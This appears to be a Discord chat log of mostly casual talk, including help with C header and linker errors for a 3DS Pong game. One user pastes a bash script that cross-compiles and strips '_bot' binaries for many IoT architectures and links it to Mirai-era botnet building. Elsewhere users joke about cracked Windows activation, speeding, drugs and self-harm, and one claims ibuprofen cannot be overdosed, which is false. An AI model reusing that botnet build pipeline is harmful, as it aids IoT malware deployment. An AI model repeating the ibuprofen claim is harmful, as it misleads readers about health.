#π§-off-topic-iceman-only
1 messages Β· Page 851 of 1
kinda shitty
I can listen to basically any genre
bet
I don't want to have to do that
join vc
cannot
sent koi hylna
because it kinda looks like I could be logging eveyrthing
LMAO
he approves
hey wassup everyone
is there any way I can find out coupon codes from a website?
yea that sucks
im just playing music lol
try honey
so they havent replied
yeah
isn't that only works on famous websites?
also tysm legit your recs legit made my day
jeez
google it
I literally cannot, I am spending time with relatives
I mean, if you're trying to use it on some like tiny small
someone's personal website
o
but if it's a store
I did
they suggest some extensions
can't find anything
cus even if they don't do coupons

they sell pc components
ok
that does not help
I can DM you the link to the live build of the game ig

π
@jaunty remnant sorry this particular playlist is mostly indian songs
I think it'll jus topen the login screen, and make it unplayable
but still force you to be logged in as me

Currently working on a project, but sure

holy shit rpc found the album art
fuck it, we bool in here
if someone is smart enough to compromise that account, they can have it
it'll get banned anyways 
only 1 person can be logged in at a time, so good luck
wuts that im out of the loop
this is actually all the songs i play in my dads car in particular
I am reverse engineering a mobile game, and porting it over to PC
with like
proper full online functionality
The live build cannot hit things
my custom C# build can, but we don't talk about that thing

this thing is the browser version
currently you can view the current battle/event your clan/team is doing
view your clan/team chat
and your current troop data
and your kingdom/buildings
which is a 7x7 grid of images π
these guys did their layout terribly
and then there's like 9 land sets of those images
currently it's hardcoded to log in as me
but I can make it have full log in functionality in like
20 minutes
I LOVE C
multiple definition of `ballMove' I HAVE DEFINED IT ONCE
@jaunty remnant this hits hard
are you including the file multiple times?
Pretty sure that happens with an inclusion loop
remember #pragma once
^
or #ifndef SOMETHING_H
tru
unless something weird in the makefile makes it auto-include all c files
make sure all ur header files have #pragma once ig
make?
they basically always should
make
i have no header files
# Compile with all cross compilers
compile_all() {
for cc in "${!cross_compilers[@]}"; do
arch=$(echo "$cc" | cut -d'-' -f3)
echo -e "[${CYAN}!${RESET}] Compiling for ${YELLOW}$arch${RESET}..."
./$cc/bin/$arch-gcc _bot/*.c -o release/"$OUTPUT_NAME.$arch" -std=c99 -lpthread -O3 -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -DIS_SERVER=$IS_SERVER -static
if [ $? -eq 0 ]; then
echo -e "[${YELLOW}$arch${RESET}] built ${GREEN}successfully${RESET}."
echo -e "[${YELLOW}$arch${RESET}] Starting Additional Proccessing."
./$cc/bin/$arch-strip release/"$OUTPUT_NAME.$arch" -S --strip-all --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr
if [ $? -eq 0 ]; then
echo -e "[${YELLOW}$arch${RESET}] Stripped ${GREEN}successfully${RESET}."
echo -e "[${YELLOW}$arch${RESET}] Cross Compiled and Stripped ${GREEN}successfully${RESET}."
echo -e "[${YELLOW}$arch${RESET}] Output file name is ${PURPLE}$OUTPUT_NAME.$arch${RESET}"
echo -e "---------------"
else
echo -e "[${YELLOW}$arch${RESET}] Stripping ${RED}failed${RESET}."
fi
else
echo -e "[${YELLOW}$arch${RESET}] Compilation ${RED}failed${RESET}."
fi
done
}
speaking of which, does the music sounnd like ass thru the stream
is ballmove a global variable
i can't use any standard build config because i'm producing a .3dsx file to run on my 3DS
I just use gcc like a nerd
maybe i should pull out jellyfin group session trol
synthwave,,
I mean, the make thingy just calls your compilers defined in it's config, yes?
check rpc
if i don't include the c file with ballMove, it complains about implicit declaration of it
declare -A cross_compilers=(
["cross-compiler-mips"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2"
["cross-compiler-mipsel"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2"
["cross-compiler-sh4"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2"
["cross-compiler-x86_64"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2"
["cross-compiler-i686"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2"
["cross-compiler-armv6l"]="http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2"
["cross-compiler-armv5l"]="https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2"
["cross-compiler-powerpc"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2"
["cross-compiler-i586"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2"
["cross-compiler-m68k"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2"
["cross-compiler-sparc"]="http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2"
["cross-compiler-armv7l"]="https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2"
["cross-compiler-aarch64-none-linux-gnu"]="https://github.com/DLTcollab/toolchain-arm/raw/main/gcc-arm-11.2-2022.02-x86_64-aarch64-none-linux-gnu.tar.xz" #This one is a fucky wucky and you have to manually do some things. Download it, extract it. Name it 'cross-compiler-aarch64-none-linux-gnu', and in rename aarch64-none-linux-gnu-gcc and aarch64-none-linux-gnu-gcc to aarch64-gcc and aarch64-strip
# Add the rest of your compilers here...
)
wanna know something really funny about these cross compilers?

i don't have any sort of config i first used C yesterday
Back when Mirai had like
just happened
and people were competing hard to set up big IoT bots
people would hold off ulibc for hours, days even
to prevent people from being able to download the compilers

- if I include the file it complains about being there twice
- if I don't, it complains about implicit declaration of function
u should never include c files only headers
that is a lot more than me
yeah this tbh
i don't even have headers
thats ur issue probably
make an icecast server
if u wanna avoid those for some reason, look into the extern keyword
i have no idea how headers work because i've never needed them before
what is that and how do i join
Admittedly, he had shoes on. But that's even worse.
aw i wanted to listen to my synthwave playlist, its been a while
basically every single c/cpp project uses headers
except for like
hello world
π
Name the banger
(my windows isnt activated either dw)
mine is just now
u love massgravel
gotta use your headers
^
I love massgravel
CAN I HHAVE
the only time i can see extern being used is if i want to modify vars in main.c using a function in ball.c, which is another thing i don't know if i'm using it right
if ball.c had main.c's header file i think it'd recurse
cant wait for genai to send win keys
??????????????????????????????????????????????????????
fuck not at home
if u want to access variables outside of the current source file, u kinda have to use extern or headers
moist critkal specific shade of white
like pantone
/j
or i think extern is like the default so u dont have to type it out u just have to declare the var
wait
but it makes more sense if u do
declaring stuff in a header then including that in multiple c files makes most sense
Got my flacs on webdav
probably
webdav
i have a hardware built in windows key
if it doesnt then u use extern
i still have no idea how header files work
when u include something its basically like copy pasted to ur source file
u just like
i know that
Chat I got to drive a real car over the weekend and now mine feels like a toy
i just want to use a function in ball.c in my main.c and have it write to main.c variables
even just using a function in ball.c with including ball.c is proving to not work
hello.h```c
#pragma once
int g_hello;
then u include #include "hello.h" in other source files and u can use the g_hello variable
how is your car still running
i feel sorry for it
What?
yeah u use headers for that
idk
i don't know how to
gotta learn
brain mush
what
Also Asians make really good cars
i can get variables in the header but i haven;t figured out how to get functions from one into another
it sounds so basic but it doesn't just work
after 13 hr awake brain begij to mush
Use javers by oraclers
#include macro?
14:29
if the file is #include'd, it complains about a function being defined multiple times. it isn't
the toyota corolla that's as old as me that my dad gave me now that I have a licence is still running mint
Exactly
// hello.h
#pragma once
void func();
// hello.c
#include "hello.h" //p sure this isnt necessary but i tihnk it makes more sense
void func() {
// ......
}
// u can use func() in this file too
// main.c
#include "hello.h"
// u can use func() in this file now
@lime talon
im pretty much ready to get my licence myself
My Kia runs fine after 160k miles of abuse
bit more parallel parking
No recalls or anything
and yea
this makes sense
although what does the pragma do
it makes sure that hello.h only gets included once
pragma deez
so it doesnt redeclare stuff
bc that would error
u should basically have that in every single header file
what is pragma once
read above

Erm what is pragma

its the same as```c
#ifndef HELLO_H
#define HELLO_H
// declare stuff here
#endif
Pragma balls
honestly im gonna be a horrible driver
i actually follow the rules because my ass is scared of getting ran into
Is there an amoled mode experiment toggle for pc
or no
I forgot where to get amoled for desktop discord
(I using vencord)
obv)
idk
theres probs a theme for it
Is this a vns moment
what the fuck does it mean unknown type name u8
i have ALL THE INCLUDES main.c had
dont think so, just use amoledcord (custom theme) or clienttheme with #000000 (vencord plugin)
idk
whenever I drive a car and my friends are there they say I really do drive like a girl now π
welcome to earft π½
thx youa
u didnt declare the type, u rpob forgot to #include a library which creates the type u8
ok but
i drive under the speed limit
whack
include types.h
on a bike if the speedlimit is 60 or higher I often do like 10-20 above the limit <.<
(not literally that)
linux/types.h
i wish i could do what @somber leaf does and go like 100 lmao
Rate the setup
i dont think shes even deving for linux
no such file or directory
yeah that assumes u have a file called types.h :P
xd
are u sure u included everything like in the other file
arguably driving under the speed limit may be more dangerous because this can put certain buggy drivers in undefined behavior (road rage)
and that u8 works in that file
ik
bbut
/hj
scawwy....
Truth
so much sensory inputs and aa
yes, literally everything
and it does
very overstimulating at times
whenever I ride to school there's a long(ish) stretch of road that's usually pretty empty at the time with a 60 speed limit and I like to do 100 there if no one is looking and otherwise 80 
understandable
you'll get used to it dw
overstimulating af
ya
helps a lot
why does u8 work in main.c but not in the header file it imports
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
take a good ide and right click it
can u show trhe file
do u have all includes at the very top of the file
how does venapp have pronouns? how can I do that with my own bots D:
like PLEASEEEE USE UR TURN SIGNAL
oh?
although thats prob uh
idt bmws come with those
murica
lol maybe they noticed your plugin
yea its back now
oh that explains a lot
true....

yep!!!!
here's all of it, when all was in one file it worked just fine
sorry to hear that
ty ill see what i can do :3
(save me,, please,,)
I probably need meds but do it scawey

I have state health insurance so price isnβt a issue
@somber leaf
hello sodiii
Ello
i prob need get my adhd and anxiety meds updated/redosed

I need something to encode in av1 when I get home
anexity i legit
it might be a little weird because it is compiling for 3DS so things might be different but as far as I am aware it is perfectly standard C
dont notice change between no meds and meds
How to write in #π-translation?
idk if thats related but put #pragma once above all the includes in ball.h
its probably not related
but
balls
thats how it should be
adhd i just think i need a slightly stronger dose
prob wont make a diff but yea
Nature documentary maybe??? They do have good quality backgrounds 
miauuuuuu
They're visually amazing too
didn't change anything, the issue is in vars.h
Not usually a high quality source tho.
Maybe
try including #include <citro2d.h> in vars.h
thats the onyl thing i can thin k of and its most likely that
thats prob where u8 is originally declared
ill try
u can check if u have a good ide
If you're outside... Why not get your own footage

in visual studio (idk about code, normal vs, ik ik, microsoft cringe blah blah)
u can right click on u8 and then go to declaration/definition
and it will show u which file its decalred in
which can be helpful
idk what other ides do that, ive been using vs for ages
idk
I could I guess. I wish I could capture in raw
ignore me
did u put pragma once on top in ball.h
pragma once is at the top of both .h files
macos sonoma wallpapers
btw @somber leaf what do you use for encoding?
main.c
linking PONG.elf
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:14: multiple definition of `ballAngle'; ball.o:/home/stuff/3ds_pong/source/vars.h:14: first defined here
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:13: multiple definition of `paused'; ball.o:/home/stuff/3ds_pong/source/vars.h:13: first defined here
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:10: multiple definition of `playerScore'; ball.o:/home/stuff/3ds_pong/source/vars.h:10: first defined here
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:9: multiple definition of `ballY'; ball.o:/home/stuff/3ds_pong/source/vars.h:9: first defined here
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:8: multiple definition of `ballX'; ball.o:/home/stuff/3ds_pong/source/vars.h:8: first defined here
/opt/devkitpro/devkitARM/bin/../lib/gcc/arm-none-eabi/14.1.0/../../../../arm-none-eabi/bin/ld: main.o:/home/stuff/3ds_pong/source/vars.h:7: multiple definition of `paddleHeight'; ball.o:/home/stuff/3ds_pong/source/vars.h:7: first defined here
collect2: error: ld returned 1 exit status
make[1]: *** [/opt/devkitpro/devkitARM//3ds_rules:44: /home/stuff/3ds_pong/PONG.elf] Error 1
make: *** [Makefile:157: all] Error 2```
@sand citrus exact errors if you want
oh ik
Av1an + svt av1 psy
ur defining the values too not just declaring
240fps what
so like
maybe make a vars.c with
paddleheight = ...
ballx = ...
etc
but in vars.h just have
u8 paddleheight;
float ballx;
...
i'll try that
it didnt
i thought you said 60
discord added pfps and images to notifs
someone needs to make an av1 encoder named cut1e
@wide hamlet gm
GUI encoders suck ass
just now?
Good afternoon.
did ios just not support images in notifs before..?
wait it exists?
idk i just saw it now on mine
gm
oomf discord never implemented it on serverside
meow
meow
Hand break?
its been in ios for decades
its rolling out
My damn airpods made the low battery sound
oh bru
:(
no i meant
sorryy i dont really know much about how notifications in ios work 
noticed it too
is there a cut1e encoder
so much better now
PRETENDO MOD IN VENCORD LMAO
Closet thing to that is x264 with the touhou preset
I CAN SORT BY PEOPLE????
ios and android share similar concept, they have central server which an appβs server backend sends notifications to so that central server sends it to the device
IN FOCUS MODES???
maybe
HOLY
dm me
its an experiment in the app too (also you can set it up so Announce Notifications only announces dms now yay (also maybe filtering people in focuses once discord figures it out))
ffmpeg -c UwUenc
Quit screaming
FINALLY
what is your opinion on the famous performance enhancing mod, sodium
also wait, are you telling me ios users can see attachments in notifications now?? im jealous
salt
@dawn iris
oomf its been like that for decades
on android it doesn't even say if there's an attachment
its just the message content :v
ah i see

the voices in my head will not stop screaming
ios hasnt till now but yall have had pfps for years let us be happy
Iβm excited
noooooo
yea this looks very good
yasss omgosh
Itβs a funny idea but it would never have the spec finished like every other free software foundation project
@sudden sun can you set friend nicknames and have them show in notifs
wait @sudden sun can you post a screenshot with an attachment in the notification
i wanna see
lol
the fact that the button is there means you probably can focus filter very soon
probably not
will try
Ven here, Embeddium is a direct upgrade to Sodium. Made my beloved developer Embeddedt!
alr linked one
@sudden sun ping me
o ty
wdym βupgradeβ
@fallow pawn
Upgrade
didnt discord already do that with notifs before π
how is it an upgrade
my notifications just refuse to work
isnβt it just a forge port
Now that is a good question
i get double notifications lol
They have a Fabric version too iirc
advaith mentioned
it didnt work
me mentioned. i block you ||/j i go outside||
hate that
A conservative using Linux is a very weird idea in my head
well i get 1 notification but the badge shows 2
@wide hamlet attachment didnt work
And do note, CaffineMC had a FOSS license. But when someone subjected forking it, they switched to Polyform non compete
tbh same vibes as ||that one famous trans person whos a Republican :(||
Idk who that is
now make cord
Horror
I mean, itβs open source
Not blushing bread face thing π
Just not free software
tf?
dont you love the modern software space
@prime python hii blushing bread face thing
You cannot copy from the source if your intent is to compete.
what is this shit did those damn liberals make this crap it must be the work of the government they want to take over the world
Hey that's my line
bread boy and aaaaaaaaamia mentioned 
@sudden sun @deep token
TRUE
So good
wild
At the end of the day, how is this different from source available but ARR?
i am indeed seeing this
@deep token @fallow pawn
qais did
I can take snippets of their stuff for unrelated projects is guess?
WHAT
they LOVE me π£οΈ
My CCTV runs off fucking .bin files 
hi bread
<insert edgy quote here>
purrrrmeow!
Please do
Hi sttn
this could be us
praise
speech text to not
aww
2 people in a healthy loving relationship
truly disgusting
yw
tor in the chat:
@sudden sun @sudden sun @sudden sun
i am hidden behind 7 proxies you cant find me
and wdym thing
hmmmmm
send twitter link i forgot to like it @burnt maple
so cute
i wanna make a blog someday
give soulz image perms when
with your name, never
if i get a domain do i go for dootsky.re or dootskyre.com
.re
first one probably
who
did some art :D
no like who is soulz
who do u think
source where
a nobody
now draw them in a healthy father daughter relationship
aka no image perms
@crystal atlas
same artistt
im everybody
bet
Poor neruo I remember when she could barely do 200 pp plays
i take up the space of 1,386 million people
meow
She can. She 1v10 the top 10 players combined and won
how do i do image perms
give me money
get better
you dont
ok lol
Commit a felony
Insert rant about p2w
Why does my emote for my role keep disappearing on mobile waaaa
if ur active enough u will either automatically get the role or a mod will give it to u
or u can donate/boost
It happens with your own latest message
prototype is my 1st fave lol
Very true
Very annoying
a npc from regretavator
showed my sister she found it cute too
AAAAAAA COMPLEX MATH
facts
Did you know you canβt overdose on ibuprofen
Sometimes it feels like I am
please consider:
Very true
ever greened out
horrifying experience but i woke up seeing silly things
then kept losing consciousness while sitting and holding my phone
awesome!
i was like
hearing silly things
too
like
i was thinking of music
ah yes vencord drug discussion
and i heard it
Thing
so true
lmao
sobriety is useless.
why would u want that
slash es and shit
sometimes only half slash es
depends on my mood
does she fw rainworld
best drain album perhaps
I have for like half a year
continue π
meow
meow .
desire to participate
everclear is yummy
i drink it for the taste
theres taste in 95% alcohol?
probably
its more like
Throat death
probably
i wouldnt know
i had the same mindset until i kinda had to
AuDHD people love weed thoβ¦,
what do you mean by HAD TO
π³
they fixed summaries π₯
was going basically insane and manic
it helped me
What if Mario jumped a little too high and landed on the flagpole
This but unironically
like a shiggy in my phone
shiggy monkey ball
yop 
Gyro demo btw
hi vencord
Hi Bentord
It does it's just off center
Tilt phone more
it was made on an iphone
For an iphone
fire
unrelated but hru !
Free bugir
BUGORRRR
No
at least one burgr
look at that cat in the pfp i think he deserves brbgr
like just one
no it doesnβt
kfd stands for kentucky fried dchicken
Talking about yourself again?
Damn
@open pasture @errant chasm meow
meow
Iβm doing well. You?
meow
doing alrightt productivity is a bit better i think cus i did slightly more than absolutely nothing today and it made me feel slightly ecstatic even toh i did almost nothing lmao
1 upped all of you
lets go..
He wanted snuggles but I was on the toilet
damn
He got them later
awesome
No, you cannot have any
not from u
FUCK YOU
damn
He snuggles
He's 17 almost 18
So is his brother #π±-silly-gatos
He's just a lil baby guy
Did you know? 1 + 1 = 3
(he's older than some people here probably)
nixos or arch
so nice
nix breaks less
i heard nix has a goofy directory structure and some stuff doesn't like it
is that true
It's due to being an immutable system
yes, but there's the FHS helper
i'm not a big fan of it (on desktops) either
meow
also all the programs in nixpkgs are compiled using nix's structure
:D
What are fedora users classified as
So relatively sane people
Simpletons too afraid of the real Linux experience
So true
vee will ban u and leak ur token
and destroy ur home
I forgot where I hid mine
switch to debian
me2
based
It does not if you know what youβre doing. Itβs the ultimate filter for a real Linux user
doesn't arch die if you don't update it
wdym by "know what you're doing"
@crude fern INSTALL ARCH
soon you will switch to codeberg
man burial is so good
all i know is you have to read the news before updating the system in case you brick it
Know how to read a fucking wiki instead of googling everything and how a package manager work and rarely if ever make your own package build script
switch off of codeberg
codeberg mirror
so know how to read and don't make package build scripts
IF API
huge
If i use gitlab to store my stuff an i considered a heretic
If you use arch you cannot be straight itβs just a fact
github stores my gpg keys so it's fine
what about void
i think codeberg is the only place i got @ayuka lmfao
my old distro pre-nixos
What about lfs
Either homophobic or autistic
autistic
so what about nix
What are lfs ppl seen as
jokes on u, 60% of the arch linux users i met are straight
π’
Extremely autistic/OCD/anxiety from using a real distro
Horror
ubuntu is such a cute name for such a trash distro
Then theyβre probably homophobic
they arent
[β] All of the above
To be clear Iβm /j
No
ik
Why is he after me
fuck y'all embeds going off again
true
Why didnβt God make me a anime girl
i know a lot of woke people irl
i'm not friends with any of them, they're too woke for me /j
ugh so true
days since autism: 0
As it should always be
those are your interests
stupid fucking process @somber leaf
my interests are NOT women π€
love this so much
no
money?
meow
yes please
wrong
I love commiting crimes against humanity
I donβt have that issue on my m3 pro
how
this an intel machine after all
pinterest knows
this is all my apps open rn
WHAT THE FUCK IS THIS DOMAIN
The atom bomb isnβt the most scary the h bomb is. Itβs literally the power of a dying star
A thing of art
Twss
WHY SO SMALL
its not that small
yeah it is
it is
so small
can u get banned for using modified discprd
This is not helping your case
INTEL MACBOOK EWWWW
:c
?
Technically yes, however discord dont really care
@twilit flower
it's better for me to delete this
wrong person
it sounds weird
wish i could have more than 3 apps open
but i uninstalled mac because
can they even know
They probably can, not sure tho.
are you sure its not just bc of a small bug that was later fixed
i mean
@fallow pawn @somber leaf do y'all think i should make a macos rice when i get apple silicon
I dont like ricing that much so I dont know
should i try mac again to see
What can you even rice on macos
my favorite site
everything
No. Mac OS was never meant to be customized your best bet is asahi Linux
???
I'm fearful i won't open that shit π¨
its poke
silly
yes install a TWM
I know theres an app to basically give macos tiling window manager things
i am very satisfied, but making some changes would be cool
i dont like twms
i dislike rounded corners zzz
just turn them off
good
Guys if I deleted a message how long can other vencord users see my message for
window s
eternity
is that rectangle but better
Cpu 
bro i dont get why ppl hate TWMs then proceed to tile manually
it works enough
me
why are u protugues
eu nao sou portuguesa
brasileira
sim
i would love to use a twm but im on a fucking shit intel macbook
com
when i upgrade ill do whatever
i don't see any issue on it
SSD then ffs
TWMs are REALLY lightweight
Hdd is pain
i literally have 3rd degree burns rn and im only on discord
LOL
huh
intel macbook moment
Can you help me cook a steak
my background apps
I canβt tell if this is a intel MacBook runs hot joke or you actually have burns
neither...
what
ππ
partially
why do you need so many
my hands are very seriously red rn
r intel macs rly that hot?
They have no cooling
Like devilbro
we told you that before lol
Devilbro my beloved
oxi
@somber leaf @boreal torrent
I wish my thinkpad was able to hackintosh
que isso
so sad that I cant
i think all thinkpads r able to
why do you need a pad to think lol i just don't think
not mine
(except by amds)
vencord's messagelogger doesn't save them anywhere iirc
which one u got
so bad
jajajajajaja
so until it quits
nunca
I like your funny words magic man
@median badger tu
however, aliucord saves a persistent db
ensenale
so good
I have one of the best Macβs money can buy and I fucking hate Mac OS
so don't run it as root?
oomf you're so confusing
I love macos
Aliens
same
I prefer it over any other os
also same
wanna trade then
:3
lol
I love arch Linux with KDE
ofc you do
someone else is getting my Mac sorry
why do u think it can't hackintosh? genq





